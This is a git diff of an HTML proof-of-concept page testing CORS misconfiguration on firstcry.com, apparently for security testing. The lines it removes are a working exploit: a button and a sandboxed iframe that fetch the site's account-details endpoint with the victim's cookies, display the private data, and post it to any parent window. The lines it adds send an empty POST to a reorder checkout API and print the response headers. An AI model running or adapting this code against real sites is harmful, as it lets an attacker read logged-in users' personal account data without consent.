--- a/cors.html
+++ b/cors.html
@@ -1,59 +1,40 @@
 <!DOCTYPE html>
 <html>
 <head>
-<title>CORS Exploit PoC</title>
+  <meta charset="UTF-8">
+  <title>CORS PoC for FirstCry Reorder Checkout</title>
 </head>
 <body>
-<h3>CORS Exploit PoC</h3>
-<button onclick="exploit()">Exploit</button>
- 
-    <script>
-
-        function exploit() {
-
-            fetch("https://www.firstcry.com/accountdetails", {
-
-                method: "GET",
-
-                credentials: "include" // Send authentication cookies
-
-            })
-
-            .then(response => response.text())
-
-            .then(data => {
-
-                console.log("Response from vulnerable API:", data);
-
-                document.body.innerHTML += "<pre>" + data + "</pre>";
-
-            })
-
-            .catch(error => console.log("Error:", error));
-
-        }
-</script>
- 
-    <h3>Iframe Sandbox Exploit</h3>
-<iframe sandbox="allow-scripts allow-top-navigation" srcdoc="
-<script>
-
-    fetch('https://www.firstcry.com/accountdetails', {
-
-        method: 'GET',
-
-        credentials: 'include'
-
-    }).then(response => response.text())
-
-      .then(data => parent.postMessage(data, '*'))
-
-      .catch(error => console.log('Error:', error));
-</script>
-
-    "></iframe>
+  <h1>CORS PoC for FirstCry Reorder Checkout API</h1>
+  <button id="testCors">Test CORS</button>
+  <pre id="output"></pre>
+  <script>
+    document.getElementById('testCors').addEventListener('click', function() {
+      fetch('https://www.firstcry.com/fcfuserqrapi/hp/reorder/checkout/products', {
+        method: 'POST',
+        mode: 'cors', // Enforces CORS
+        headers: {
+          'Content-Type': 'application/x-www-form-urlencoded'
+        },
+        body: '' // As specified: no payload
+      })
+      .then(response => {
+        // Display the response status and headers if available
+        const output = document.getElementById('output');
+        output.textContent = `Response Status: ${response.status}\n`;
+        response.headers.forEach((value, key) => {
+          output.textContent += `${key}: ${value}\n`;
+        });
+        return response.text();
+      })
+      .then(text => {
+        console.log('Response Body:', text);
+      })
+      .catch(err => {
+        document.getElementById('output').textContent = 'Error: ' + err;
+        console.error('Error:', err);
+      });
+    });
+  </script>
 </body>
 </html>
-
-FirstCry Account Login
- 
